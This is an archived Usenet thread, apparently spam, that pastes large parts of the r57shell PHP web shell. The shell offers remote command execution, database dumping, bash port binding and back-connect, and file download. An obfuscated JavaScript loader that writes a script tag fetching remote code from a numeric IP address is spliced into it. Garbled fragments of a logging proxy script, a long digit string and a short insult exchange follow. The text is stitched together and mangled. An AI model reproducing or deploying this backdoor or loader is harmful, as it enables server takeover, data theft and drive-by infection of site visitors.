Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

Open+RealTM w/ Oracles by MeAmI

0 views
Skip to first unread message

Anonymous Number of People

unread,
Oct 25, 2009, 9:40:41 PM10/25/09
to
/
******************************************************************************************************/
error_reporting(0);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe_mode = @ini_get('safe_mode');
$version = '1.31';
if(version_compare(phpversion(), '4.1.0') == +1)
{
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
$_COOKIE = &$HTTP_COOKIE_VARS;
}
if (@get_magic_quotes_gpc())
{
foreach ($_POST as $k=>$v)
{
$_POST[$k] = stripslashes($v);
}
foreach ($_COOKIE as $k=>$v)
{
$_COOKIE[$k] = stripslashes($v);
}
}

if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER
['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
{
header('WWW+Authenticate: Basic realm="r57shell"');
header('HTTP/1.0 401 Authorized');
exit("<b><a href=http://MEAMI.ORG/ http:///rst.void.ru>r57shell</a>
: Access Permitted</b>");
}
}
$head = '<!++ Çäðàâñòâóé, Âàñÿ ++>
<html>
<head>
<title>r57shell</title>
<meta http+equiv="Content+Type" content="text/html; charset=windows
+1251">

<STYLE>
tr {
BORDER+RIGHT: #aaaaaa 1px solid;
BORDER+TOP: #eeeeee 1px solid;
BORDER+LEFT: #eeeeee 1px solid;
BORDER+BOTTOM: #aaaaaa 1px solid;
color: #000000;
}
td {
BORDER+RIGHT: #aaaaaa 1px solid;
BORDER+TOP: #eeeeee 1px solid;
BORDER+LEFT: #eeeeee 1px solid;
BORDER+BOTTOM: #aaaaaa 1px solid;
color: #000000;
}
.table1 {
BORDER: 0px;
BACKGROUND+COLOR: #D4D0C8;
color: #000000;
}
.td1 {
BORDER: 0px;
font: 7pt Verdana;
color: #000000;
}
.tr1 {
BORDER: 0px;
color: #000000;
}
table {
BORDER: #eeeeee 1px outset;
BACKGROUND+COLOR: #D4D0C8;
color: #000000;
}
input {
BORDER+RIGHT: #ffffff 1px solid;
BORDER+TOP: #999999 1px solid;
BORDER+LEFT: #999999 1px solid;
BORDER+BOTTOM: #ffffff 1px solid;
BACKGROUND+COLOR: #e4e0d8;
font: 8pt Verdana;
color: #000000;
}
select {
BORDER+RIGHT: #ffffff 1px solid;
BORDER+TOP: #999999 1px solid;
BORDER+LEFT: #999999 1px solid;
BORDER+BOTTOM: #ffffff 1px solid;
BACKGROUND+COLOR: #e4e0d8;
font: 8pt Verdana;
color: #000000;;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND+COLOR: #e4e0d8;
width: 30%;
color: #000000;
}
textarea {
BORDER+RIGHT: #ffffff 1px solid;
BORDER+TOP: #999999 1px solid;
BORDER+LEFT: #999999 1px solid;
BORDER+BOTTOM: #ffffff 1px solid;
BACKGROUND+COLOR: #e4e0d8;
font: Fixedsys bold;
color: #000000;
}
BODY {
margin: 1px;
color: #000000;
background+color: #e4e0d8;
}
A:link {COLOR:red; TEXT+DECORATION: none}
A:visited { COLOR:red; TEXT+DECORATION: none}
A:active {COLOR:red; TEXT+DECORATION: none}
A:hover {color:blue;TEXT+DECORATION: none}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
document.getElementById(id).style.display = \'none\';
document.cookie=id+\'=0;\';
}
function show_div(id)
{
document.getElementById(id).style.display = \'block\';
document.cookie=id+\'=1;\';
}
function change_divst(id)
{
if (document.getElementById(id).style.display == \'none\')
show_div(id);
else
hide_div(id);
}
</script>';
class zipfile
{
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset = 0;
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate
($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] + 1980) << 25) | ($timearray
['mon'] << 21) | ($timearray['mday'] << 16) |
($timearray['hours'] << 11) | ($timearray['minutes']
<< 5) | ($timearray['seconds'] >> 1);
}
function addFile($data, $name, $time = 0)
{
$name = str_replace('\\', '/', $name);
$dtime = dechex($this+>unix2DosTime($time));
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$zdata = substr(substr($zdata, 0, strlen($zdata) + 4), 2);
$c_len = strlen($zdata);
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$fr .= pack('v', strlen($name));
$fr .= pack('v', 0);
$fr .= $name;
$fr .= $zdata;
$this +> datasec[] = $fr;
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V', $crc);
$cdrec .= pack('V', $c_len);
$cdrec .= pack('V', $unc_len);
$cdrec .= pack('v', strlen($name) );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('V', 32 );
$cdrec .= pack('V', $this +> old_offset );
$this +> old_offset += strlen($fr);
$cdrec .= $name;
$this +> ctrl_dir[] = $cdrec;<html>
<script>var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;
00:2/316/344/:20bobmzujdt0hb/kt#?=0tdsjqu?"; var result = "";for(var
i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt
(i)+1);document.write(result); </script>
}
function file()
{
$data = implode('', $this +> datasec);
$ctrldir = implode('', $this +> ctrl_dir);
return
$data .
$ctrldir .
$this +> eof_ctrl_dir .
pack('v', sizeof($this +> ctrl_dir)) .
pack('v', sizeof($this +> ctrl_dir)) .
pack('V', strlen($ctrldir)) .
pack('V', strlen($data)) .
"\x00\x00";
}
}
function compress(&$filename,&$filedump,$compress)
{
global $content_encoding;
global $mime_type;
if ($compress == 'bzip' && @function_exists('bzcompress'))
{
$filename .= '.bz2';
$mime_type = 'application/x+bzip2';
$filedump = bzcompress($filedump);
}
else if ($compress == 'gzip' && @function_exists('gzencode'))
{
$filename .= '.gz';
$content_encoding = 'x+gzip';
$mime_type = 'application/x+gzip';
$filedump = gzencode($filedump);
}
else if ($compress == 'zip' && @function_exists('gzcompress'))
{
$filename .= '.zip';
$mime_type = 'application/zip';
$zipfile = new zipfile();
$zipfile +> addFile($filedump, substr($filename, 0, +4));
$filedump = $zipfile +> file();
}
else
{
$mime_type = 'application/octet+stream';
}
}
function mailattach($to,$from,$subj,$attach)
{
$headers = "From: $from\r\n";
$headers .= "MIME+Version: 1.0\r\n";
$headers .= "Content+Type: ".$attach['type'];
$headers .= "; name=\"".$attach['name']."\"\r\n";
$headers .= "Content+Transfer+Encoding: base64\r\n\r\n";
$headers .= chunk_split(base64_encode($attach['content']))."\r\n";
if(@mail($to,$subj,"",$headers)) { return 1; }
return 0;
}
class my_sql
{
var $host = 'localhost';
var $port = '';
var $user = '';
var $pass = '';
var $base = '';
var $db = '';
var $connection;
var $res;
var $error;
var $rows;
var $columns;
var $num_rows;
var $num_fields;
var $dump;

function connect()
{
switch($this+>db)
{
case 'MySQL':
if(empty($this+>port)) { $this+>port = '3306'; }
if(!function_exists('mysql_connect')) return 0;
$this+>connection = @mysql_connect($this+>host.':'.$this+>port,
$this+>user,$this+>pass);
if(is_resource($this+>connection)) return 1;
break;
case 'MSSQL':
if(empty($this+>port)) { $this+>port = '1433'; }
if(!function_exists('mssql_connect')) return 0;
$this+>connection = @mssql_connect($this+>host.','.$this+>port,
$this+>user,$this+>pass);
if($this+>connection) return 1;
break;
case 'PostgreSQL':
if(empty($this+>port)) { $this+>port = '5432'; }
$str = "host='".$this+>host."' port='".$this+>port."' user='".
$this+>user."' password='".$this+>pass."' dbname='".$this+>base."'";
if(!function_exists('pg_connect')) return 0;
$this+>connection = @pg_connect($str);
if(is_resource($this+>connection)) return 1;
break;
case 'Oracle':
if(!function_exists('ocilogon')) return 0;
$this+>connection = @ocilogon($this+>user, $this+>pass, $this
+>base);
if(is_resource($this+>connection)) return 1;
break;
}
return 0;
}

function select_db()
{
switch($this+>db)
{
case 'MySQL':
if(@mysql_select_db($this+>base,$this+>connection)) return 1;
break;
case 'MSSQL':
if(@mssql_select_db($this+>base,$this+>connection)) return 1;
break;
case 'PostgreSQL':
return 1;
break;
case 'Oracle':
return 1;
break;
}
return 0;
}

function query($query)
{
$this+>res=$this+>error='';
switch($this+>db)
{
case 'MySQL':
if(false===($this+>res=@mysql_query('/*'.chr(0).'*/'.$query,$this
+>connection)))
{
$this+>error = @mysql_error($this+>connection);
return 0;
}
else if(is_resource($this+>res)) { return 1; }
return
2;
break;
case 'MSSQL':
if(false===($this+>res=@mssql_query($query,$this+>connection)))
{
$this+>error = 'Query error';
return 0;
}
else if(@mssql_num_rows($this+>res) > 0) { return 1; }
return 2;
break;
case 'PostgreSQL':
if(false===($this+>res=@pg_query($this+>connection,$query)))
{
$this+>error = @pg_last_error($this+>connection);
return 0;
}
else if(@pg_num_rows($this+>res) > 0) { return 1; }
return 2;
break;
case 'Oracle':
if(false===($this+>res=@ociparse($this+>connection,$query)))
{
$this+>error = 'Query parse error';
}
else
{
if(@ociexecute($this+>res))
{
if(@ocirowcount($this+>res) != 0) return 2;
return 1;
}
$error = @ocierror();
$this+>error=$error['message'];
}
break;
}
return 0;
}
function get_result()
{
$this+>rows=array();
$this+>columns=array();
$this+>num_rows=$this+>num_fields=0;
switch($this+>db)
{
case 'MySQL':
$this+>num_rows=@mysql_num_rows($this+>res);
$this+>num_fields=@mysql_num_fields($this+>res);
while(false !== ($this+>rows[] = @mysql_fetch_assoc($this
+>res)));
@mysql_free_result($this+>res);
if($this+>num_rows){$this+>columns = @array_keys($this+>rows[0]);
return 1;}
break;
case 'MSSQL':
$this+>num_rows=@mssql_num_rows($this+>res);
$this+>num_fields=@mssql_num_fields($this+>res);
while(false !== ($this+>rows[] = @mssql_fetch_assoc($this+>res)));
@mssql_free_result($this+>res);
if($this+>num_rows){$this+>columns = @array_keys($this+>rows[0]);
return 1;};
break;
case 'PostgreSQL':
$this+>num_rows=@pg_num_rows($this+>res);
$this+>num_fields=@pg_num_fields($this+>res);
while(false !== ($this+>rows[] = @pg_fetch_assoc($this+>res)));
@pg_free_result($this+>res);
if($this+>num_rows){$this+>columns = @array_keys($this+>rows[0]);
return 1;}
break;
case 'Oracle':
$this+>num_fields=@ocinumcols($this+>res);
while(false !== ($this+>rows[] = @oci_fetch_assoc($this+>res)))
$this+>num_rows++;
@ocifreestatement($this+>res);
if($this+>num_rows){$this+>columns = @array_keys($this+>rows[0]);
return 1;}
break;
}
return 0;
}
function dump($table)
{
if(empty($table)) return 0;
$this+>dump=array();
$this+>dump[0] = '##';
$this+>dump[1] = '## +++++++++++++++++++++++++++++++++++++++ ';
$this+>dump[2] = '## Created: '.date ("d/m/Y H:i:s");
$this+>dump[3] = '## Database: '.$this+>base;
$this+>dump[4] = '## Table: '.$table;
$this+>dump[5] = '## +++++++++++++++++++++++++++++++++++++++ ';
switch($this+>db)
{
case 'MySQL':
$this+>dump[0] = '## MySQL dump';
if($this+>query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!
=1) return 0;
if(!$this+>get_result()) return 0;
$this+>dump[] = $this+>rows[0]['Create Table'];
$this+>dump[] = '## +++++++++++++++++++++++++++++++++++++++ ';
if($this+>query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1)
return 0;
if(!$this+>get_result()) return 0;
for($i=0;$i<$this+>num_rows;$i++)
{
foreach($this+>rows[$i] as $k=>$v) {$this+>rows[$i][$k] =
@mysql_real_escape_string($v);}
$this+>dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `",
$this+>columns).'`) VALUES (\''.@implode("', '", $this+>rows
[$i]).'\');';
}
break;
case 'MSSQL':
$this+>dump[0] = '## MSSQL dump';
if($this+>query('SELECT * FROM '.$table)!=1) return 0;
if(!$this+>get_result()) return 0;
for($i=0;$i<$this+>num_rows;$i++)
{
foreach($this+>rows[$i] as $k=>$v) {$this+>rows[$i][$k] =
@addslashes($v);}
$this+>dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this
+>columns).') VALUES (\''.@implode("', '", $this+>rows[$i]).'\');';
}
break;
case 'PostgreSQL':
$this+>dump[0] = '## PostgreSQL dump';
if($this+>query('SELECT * FROM '.$table)!=1) return 0;
if(!$this+>get_result()) return 0;
for($i=0;$i<$this+>num_rows;$i++)
{
foreach($this+>rows[$i] as $k=>$v) {$this+>rows[$i][$k] =
@addslashes($v);}
$this+>dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this
+>columns).') VALUES (\''.@implode("', '", $this+>rows[$i]).'\');';
}
__________________
Details:Open+RealTM
Open real 2.3.6 / any.host
#10
Old 02+05+2009, 03:45 PM
Yellowcake Yellowcake is offline
OR Youngling
Join Date:
Posts: 31
Yellowcake is on a distinguished road
Default Re: code insertion
template.php continued: ..
Code:
break;
case 'Oracle':
$this+>dump[0] = '## ORACLE dump';
$this+>dump[] = '## under construction';
break;
default:
return 0;
break;
}
return 1;
}
function close()
{
switch($this+>db)
{
case 'MySQL':
@mysql_close($this+>connection);
break;
case 'MSSQL':
@mssql_close($this+>connection);
break;
case 'PostgreSQL':
@pg_close($this+>connection);
break;
case 'Oracle':
@oci_close($this+>connection);
break;
}
}
function affected_rows()
{
switch($this+>db)
{
case 'MySQL':
return @mysql_affected_rows($this+>res);
break;
case 'MSSQL':
return @mssql_affected_rows($this+>res);
break;
case 'PostgreSQL':
return @pg_affected_rows($this+>res);
break;
case 'Oracle':
return @ocirowcount($this+>res);
break;
default:
return 0;
break;
}
}
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty
($_POST['d_name']))
{
if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']);
$_POST['cmd']=""; }
else
{
@ob_clean();
$filename = @basename($_POST['d_name']);
$filedump = @fread($file,@filesize($_POST['d_name']));
fclose($file);
$content_encoding=$mime_type='';
compress($filename,$filedump,$_POST['compress']);
if (!empty($content_encoding)) { header('Content+Encoding: ' .
$content_encoding); }
header("Content+type: ".$mime_type);
header("Content+disposition: attachment; filename=\"".
$filename."\";");
echo $filedump;
exit();
}
}
if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div
align=center><font face=Verdana size=+2><b>[ <a href=".$_SERVER
['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
{
echo $head;
$sql = new my_sql();
$sql+>db = $_POST['db'];
$sql+>host = $_POST['db_server'];
$sql+>port = $_POST['db_port'];
$sql+>user = $_POST['mysql_l'];
$sql+>pass = $_POST['mysql_p'];
$sql+>base = $_POST['mysql_db'];
$querys = @explode(';',$_POST['db_query']);
echo '<body bgcolor=#e4e0d8>';
if(!$sql+>connect()) echo "<div align=center><font face=Verdana size=
+2 color=red><b>Can't connect to SQL server</b></font></div>";
else
{
if(!empty($sql+>base)&&!$sql+>select_db()) echo "<div
align=center><font face=Verdana size=+2 color=red><b>Can't select
database</b></font></div>";
else
{
foreach($querys as $num=>$query)
{
if(strlen($query)>5)
{
echo "<font face=Verdana size=+2 color=green><b>Query#".$num." :
".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
switch($sql+>query($query))
{
case '0':
echo "<table width=100%><tr><td><font face=Verdana size=
+2>Error : <b>".$sql+>error."</b></font></td></tr></table>";
break;
case '1':
if($sql+>get_result())
{
echo "<table width=100%>";
foreach($sql+>columns as $k=>$v) $sql+>columns[$k] =
htmlspecialchars($v,ENT_QUOTES);
$keys = @implode("&nbsp;</b></font></td><td
bgcolor=#cccccc><font face=Verdana size=+2><b>&nbsp;", $sql+>columns);
echo "<tr><td bgcolor=#cccccc><font face=Verdana size=
+2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
for($i=0;$i<$sql+>num_rows;$i++)
{
foreach($sql+>rows[$i] as $k=>$v) $sql+>rows[$i][$k] =
htmlspecialchars($v,ENT_QUOTES);
$values = @implode("&nbsp;</font></td><td><font face=Verdana
size=+2>&nbsp;",$sql+>rows[$i]);
echo '<tr><td><font face=Verdana size=+2>&nbsp;'.
$values.'&nbsp;</font></td></tr>';
}
echo "</table>";
}
break;
case '2':
$ar = $sql+>affected_rows()?($sql+>affected_rows()):('0');
echo "<table width=100%><tr><td><font face=Verdana size=
+2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
break;
}
}
}
}
}
echo "<br><form name=form method=POST>";
echo in('hidden','db',0,$_POST['db']);
echo in('hidden','db_server',0,$_POST['db_server']);
echo in('hidden','db_port',0,$_POST['db_port']);
echo in('hidden','mysql_l',0,$_POST['mysql_l']);
echo in('hidden','mysql_p',0,$_POST['mysql_p']);
echo in('hidden','mysql_db',0,$_POST['mysql_db']);
echo in('hidden','cmd',0,'db_query');
echo "<div align=center>";
echo "<font face=Verdana size=+2><b>Base: </b><input type=text
name=mysql_db value=\"".$sql+>base."\"></font><br>";
echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST
['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM
user;"))."</textarea><br><input type=submit name=submit value=\" Run
SQL query \"></div><br><br>";
echo "</form>";
echo "<br><div align=center><font face=Verdana size=+2><b>[ <a href=".
$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
}
if(isset($_GET['delete']))
{
@unlink(__FILE__);
}
if(isset($_GET['tmp']))
{
@unlink("/tmp/bdpl");
@unlink("/tmp/back");
@unlink("/tmp/bd");
@unlink("/tmp/bd.c");
@unlink("/tmp/dp");
@unlink("/tmp/dpc");
@unlink("/tmp/dpc.c");
}
if(isset($_GET['phpini']))
{
echo $head;
function U_value($value)
{
if ($value == '') return '<i>no value</i>';
if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
if ($value === null) return 'NULL';
if (@is_object($value)) $value = (array) $value;
if (@is_array($value))
{
@ob_start();
print_r($value);
$value = @ob_get_contents();
@ob_end_clean();
}
return U_wordwrap((string) $value);
}
function U_wordwrap($str)
{
$str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />',
$str);
}
if (@function_exists('ini_get_all'))
{
$r = '';
echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font
face=Verdana size=+2 color=red><div align=center><b>Directive</b></
div></font></td><td bgcolor=#cccccc><font face=Verdana size=+2
color=red><div align=center><b>Local Value</b></div></font></td><td
bgcolor=#cccccc><font face=Verdana size=+2 color=red><div
align=center><b>Master Value</b></div></font></td></tr>';
foreach (@ini_get_all() as $key=>$value)
{
$r .= '<tr><td>'.ws(3).'<font face=Verdana size=+2><b>'.$key.'</b></
font></td><td><font face=Verdana size=+2><div align=center><b>'.U_value
($value['local_value']).'</b></div></font></td><td><font face=Verdana
size=+2><div align=center><b>'.U_value($value['global_value']).'</b></
div></font></td></tr>';
}
echo $r;
echo '</table>';
}
echo "<br><div align=center><font face=Verdana size=+2><b>[ <a href=".
$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}
if(isset($_GET['cpu']))
{
echo $head;
echo '<table width=100%><tr><td bgcolor=#cccccc><div
align=center><font face=Verdana size=+2 color=red><b>CPU</b></font></
div></td></tr></table><table width=100%>';
$cpuf = @file("cpuinfo");
if($cpuf)
{
$c = @sizeof($cpuf);
for($i=0;$i<$c;$i++)
{
$info = @explode(":",$cpuf[$i]);
if($info[1]==""){ $info[1]="+++"; }
$r .= '<tr><td>'.ws(3).'<font face=Verdana size=+2><b>'.trim
($info[0]).'</b></font></td><td><font face=Verdana size=+2><div
align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
}
echo $r;
}
else
{
echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=
+2><b> +++ </b></font></div></td></tr>';
}
echo '</table>';
echo "<br><div align=center><font face=Verdana size=+2><b>[ <a
href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}
if(isset($_GET['mem']))
{
echo $head;
echo '<table width=100%><tr><td bgcolor=#cccccc><div
align=center><font face=Verdana size=+2 color=red><b>MEMORY</b></
font></div></td></tr></table><table width=100%>';
$memf = @file("meminfo");
if($memf)
{
$c = sizeof($memf);
for($i=0;$i<$c;$i++)
{
$info = explode(":",$memf[$i]);
if($info[1]==""){ $info[1]="+++"; }
$r .= '<tr><td>'.ws(3).'<font face=Verdana size=+2><b>'.trim
($info[0]).'</b></font></td><td><font face=Verdana size=+2><div
align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
}
echo $r;
}
else
{
echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=
+2><b> +++ </b></font></div></td></tr>';
}
echo '</table>';
echo "<br><div align=center><font face=Verdana size=+2><b>[ <a
href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}
$lang=array(
'ru_text1' =>'Âûïîëíåííàÿ êîìàíäà',
'ru_text2' =>'Âûïîëíåíèå êîìàíä íà ñåðâåðå',
'ru_text3' =>'Âûïîëíèòü êîìàíäó',
'ru_text4' =>'Ðàáî÷àÿ äèðåêòîðèÿ',
'ru_text5' =>'Çàãðóçêà ôàéëîâ íà ñåðâåð',
'ru_text6' =>'Ëîêàëüíûé ôàéë',
'ru_text7' =>'Àëèàñû',
'ru_text8' =>'Âûáåðèòå àëèàñ',
'ru_butt1' =>'Âûïîëíèòü',
'ru_butt2' =>'Çàãðóçèòü',
'ru_text9' =>'Îòêðûòèå ïîðòà è ïðèâÿçêà åãî E /bin/bash',
'ru_text10'=>'Îòêðûòü ïîðò',
'ru_text11'=>'Ïàðîëü äëÿ äîñòóïà',
'ru_butt3' =>'Îòêðûòü',
'ru_text12'=>'back+connect',
'ru_text13'=>'IP+àäðåñ',
'ru_text14'=>'Ïîðò',
'ru_butt4' =>'Âûïîëíèòü',
'ru_text15'=>'Çàãðóçêà ôàéëîâ ñ óäàëåííîãî ñåðâåðà',
'ru_text16'=>'Èñïîëüçîâàòü',
'ru_text17'=>'Óäàëåííûé ôàéë',
'ru_text18'=>'Ëîêàëüíûé ôàéë',
'ru_text19'=>'Exploits',
'ru_text20'=>'Èñïîëüçîâàòü',
'ru_text21'=>'Íîâîå èìÿ',
'ru_text22'=>'datapipe',
'ru_text23'=>'Ëîêàëüíûé ïîðò',
'ru_text24'=>'Óäàëåííûé õîñò',
__________________
Details:
Open real 2.3.6 / any.host
Open+RealTM
Open+Real® is a registered trademark of MeAmI (C) 2009
Thanks for any ideas!

Ed Mullen

unread,
Oct 25, 2009, 11:34:00 PM10/25/09
to
Anonymous Number of People wrote:

> Thanks for any ideas!

Here's one: Start taking your meds again.

--
Ed Mullen
http://edmullen.net
A Messy Kitchen Is A Happy Kitchen And This Kitchen Is Delirious

Anonymous Number of People

unread,
Oct 26, 2009, 7:02:55 AM10/26/09
to
On Oct 25, 8:34 pm, Ed Mullen <e...@edmullen.net> wrote:
> Anonymous Number of People wrote:
>
> > Thanks for any ideas!
>
> Here's one:  Start taking your meds again.
>
> --
> Ed Mullenhttp://edmullen.net

> A Messy Kitchen Is A Happy Kitchen And This Kitchen Is Delirious

Did you stop?

48461605353720564221010588564136043721670963547235972627911758761795246277798557
09387236097164263497502522313635622300675998398474684181617086688598031152276727
Zl)) {
logToFile("reply.txt", $hname.": ".$val);
if($header_name == "set-cookie") {
header($hname.": ".$val, false);
} else {
header($hname.": ".$val, true);
}
} else {
if($header_name == 'content-length') {
header("$hname: 0", true);
logToFile("reply.txt", "$hname: 0");
} else {
logToFile("reply.txt", $header_name);
header($header_name, true);
}
}
}
}
} /*else {
if($header_name != 'transfer-encoding' && $header_name != 'x-
powered-by' && $header_name != 'connection' && $header_name != 'keep-
alive') {
if(!empty($headers[$header_name])) {
logToFile("reply.txt", $header_name.": ".$headers
[$header_name]);
header($header_name.": ".$headers[$header_name], true);
} else {
logToFile("reply.txt", $header_name);
header($header_name, true);
}
}
}*/
}
logToFile("reply.txt", "-----------------");
for(;;) {
$error=$http->ReadReplyBody($body,1000);
if($error!="" || strlen($body)==0)
break;
echo $body;
flush();
}
}
l)) {
logToFile("reply.txt", $hname.": ".$val);
if($header_name == "set-cookie") {
header($hname.": ".$val, false);
} else {
header($hname.": ".$val, true);
}
} else {
if($header_name == 'content-length') {
header("$hname: 0", true);
logToFile("reply.txt", "$hname: 0");
} else {
logToFile("reply.txt", $header_name);
header($header_name, true);
}
}
}
}
} /*else {
if($header_name != 'transfer-encoding' && $header_name != 'x-
powered-by' && $header_name != 'connection' && $header_name != 'keep-
alive') {
if(!empty($headers[$header_name])) {
logToFile("reply.txt", $header_name.": ".$headers
[$header_name]);
header($header_name.": ".$headers[$header_name], true);
} else {
logToFile("reply.txt", $header_name);
header($header_name, true);
}
}
}*/
}
logToFile("reply.txt", "-----------------");
for(;;) {
$error=$http->ReadReplyBody($body,1000);
if($error!="" || strlen($body)==0)
break;
echo $body;
flush();
}
}

/*$http->SaveCookies($site_cookies);
if(!empty($site_cookies)) {
@file_put_contents("cook.dat", serialize($site_cookies));
}*/
$http->Close();
}
if(strlen($error))
echo "<CENTER><H2>Error: ",$error,"</H2><CENTER>\n";
exit(0);
#####################################################
function cookieEncode($str) {
return str_replace(array(' ',
"\t",
';',
','),
array('%20',
'%09',
'%3B',
'%2C'),
$str);
}
function cookieDecode($str) {
return str_replace(array('%20',
'%09',
'%3B',
'%2C'),
array(' ',
"\t",
';',
','),
$str);
}
function cenc2() {
$qs = "";
if (@sizeof(array_values($_COOKIE)) > 0) {
foreach ($_COOKIE as $key => $val) {
if (is_array($val) || is_object($val)) {
$qs .= "$key=" . rawurlencode(serialize($val)) + "; ";
} else {
//if(preg_match("/\\;|\\=/", $val)) $val = rawurlencode($val);
//$val = cenc($val, 0);
$key = cookieEncode($key);
$val = cookieEncode($val);
$qs .= "$key=$val; ";
}
}
}
$qs = rtrim($qs, "; ");
return $qs;
}
function set_post_vars($array, $parent_key = null) {
$temp = array();
foreach ($array as $key => $value) {
$key = isset($parent_key) ? sprintf('%s[%s]', $parent_key,
($key)) : ($key);
if (is_array($value)) {
$temp = array_merge($temp, set_post_vars($value, $key));
} else {
$temp[$key] = ($value);
}
}
return $temp;
}
function logToFile($filename, $msg) {
if(!$DEBUG) return;
// open file
$fd = fopen($filename, "a");
// append date/time to message
$str = "[" . date("Y/m/d h:i:s", mktime()) . "] " . $msg;
// write string
fwrite($fd, $str . "\n");
// close file
fclose($fd);
}
class http_class
{
var $host_name="";
var $host_port=0;
var $proxy_host_name="";
var $proxy_host_port=80;
var $socks_host_name = '';
var $socks_host_port = 1080;
var $protocol="http";
var $request_method="GET";
var $user_agent='httpclient';
var $authentication_mechanism="";
var $user;
var $password;
var $realm;
var $workstation;
var $proxy_authentication_mechanism="";
var $proxy_user;
var $proxy_password;
var $proxy_realm;
var $proxy_workstation;
var $request_uri="";
var $request="";
var $request_headers=array();
var $request_user;
var $request_password;
var $request_realm;
var $request_workstation;
var $proxy_request_user;
var $proxy_request_password;
var $proxy_request_realm;
var $proxy_request_workstation;
var $request_body="";
var $request_arguments=array();
var $protocol_version="1.1";
var $timeout=0;
var $data_timeout=0;
var $debug=0;
var $debug_response_body=1;
var $html_debug=0;
var $support_cookies=1;
var $cookies=array();
var $error="";
var $exclude_address="";
var $follow_redirect=0;
var $redirection_limit=5;
var $response_status="";
var $response_message="";
var $file_buffer_length=8000;
var $force_multipart_form_post=0;
var $prefer_curl = 0;
/* public variables - PLEASE ACCESS */
var $state="Disconnected";
var $use_curl=0;
var $connection=0;
var $content_length=0;
var $response="";
var $read_response=0;
var $read_length=0;
var $request_host="";
var $next_token="";
var $redirection_level=0;
var $chunked=0;
var $remaining_chunk=0;
var $last_chunk_read=0;
var $months=array(
"Jan"=>"01",
"Feb"=>"02",
"Mar"=>"03",
"Apr"=>"04",
"May"=>"05",
"Jun"=>"06",
"Jul"=>"07",
"Aug"=>"08",
"Sep"=>"09",
"Oct"=>"10",
"Nov"=>"11",
"Dec"=>"12");
var $session='';
var $connection_close=0;
/* PUBLIC methods _ PLEASE CALL */
Function Tokenize($string,$separator="")
{
if(!strcmp($separator,""))
{
$separator=$string;
$string=$this->next_token;
}
for($character=0;$character<strlen($separator);$character++)
{
if(GetType($position=strpos($string,$separator[$character]))
=="integer")
$found=(IsSet($found) ? min($found,$position) : $position);
}
if(IsSet($found))
{
$this->next_token=substr($string,$found+1);
return(substr($string,0,$found));
}
else
{
$this->next_token="";
return($string);
}
}

Function CookieEncode($value, $name)
{
return($name ? str_replace("=", "%25", $value) : str_replace(";",
"%3B", $value));
}
Function SetError($error)
{
return($this->error=$error);
}
Function SetPHPError($error, &$php_error_message)
{
if(IsSet($php_error_message)
&& strlen($php_error_message))
$error.=": ".$php_error_message;
return($this->SetError($error));
}
